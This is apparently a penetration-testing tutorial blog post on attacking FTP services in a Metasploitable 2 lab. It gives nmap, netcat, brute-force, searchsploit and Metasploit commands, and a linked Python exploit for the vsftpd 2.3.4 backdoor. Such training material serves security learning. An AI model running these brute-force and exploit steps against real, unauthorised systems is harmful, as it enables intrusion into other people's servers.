Hello everyone! welcome to pentestguy. In this post we are going to discuss about ftp service penetration testing, as we know that FTP is one of the most common service we have ever found. Here we are going to see some common ways of ftp service penetration testing like identifying and exploitation.
What is FTP?
FTP refers to File Transfer Protocol, which helps transfer files from one system to another. by default port number for FTP is 21 and remember that the user/admin can change it. Some most common FTP applications are FileZilla, VSFtpd, and Core FTP.
In ftp or any other service like ssh, the tester always goes with the decided flow like checking for the version, trying default credentials, and checking any existing vulnerabilities for the respected version. For demonstrating the practicals we are using Metasploitable 2 as our playground.
Check for Version/Banner grabbing
Banner grabbing is a technique used to get information about the computer like services running on a specific port. using Netcat or Nmap can able to grab a version easily and further check that version for different vulnerabilities.
nc 192.168.X.X 21
nmap -sV -p 21 192.168.X.X
Check for anonymous users allowed
Anonymous user is one of the most common issues in FTP service due to lack of misconfiguration. or we can say default configurations. Can test this directly via login with an anonymous user or else can check with Nmap with the help of ftp-anon .nse script.
Check all nse scripts into the nmap documentation – https://nmap.org/book/nse.html
nmap --script ftp-anon.nse -p 21 192.168.X.X
ftp 192.168.X.X
Check for brute force
In many cases, users employ default or easily guessable passwords found in the wordlist. Can use multiple tools like nmap, hydra, metasploit-framework.
nmap --script ftp-brute -p 21 192.168.X.X
Check for Vulnerabilities and Exploitation
After version detection, an attacker can search for existing vulnerabilities for that specific version using different ways like searchsploit, simply google.
Searchsploit is another tool, which uses exploit-db data to get information about exploit for a software.
searchsploit -t vsftpd
Once got an existing vulnerability is present then we can search for an exploit for that vulnerability. There are different ways to exploit vulnerability like using an automated framework or script and the other way is manual. here we are going to use an automated framework named metasploit-framework and also going to use a python script for the same.
msfconsole -q
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set rhosts 192.168.X.X
exploit
In the way given below, going to use the python exploit for the required python3. use this link to download https://github.com/ahervias77/vsftpd-2.3.4-exploit and follow the command given below.
python3 vsftpd_234_exploit.py 192.168.X.X 21 whoami
There may be some other exploits that can try depending on the situation. hope it covers almost all ways.
If you found this post helpful then please share it with your co-workers and friends. Please provide your valuable comment and let us know if there is any suggestion. Now you can also collab with us please check our collaboration page, thank you!
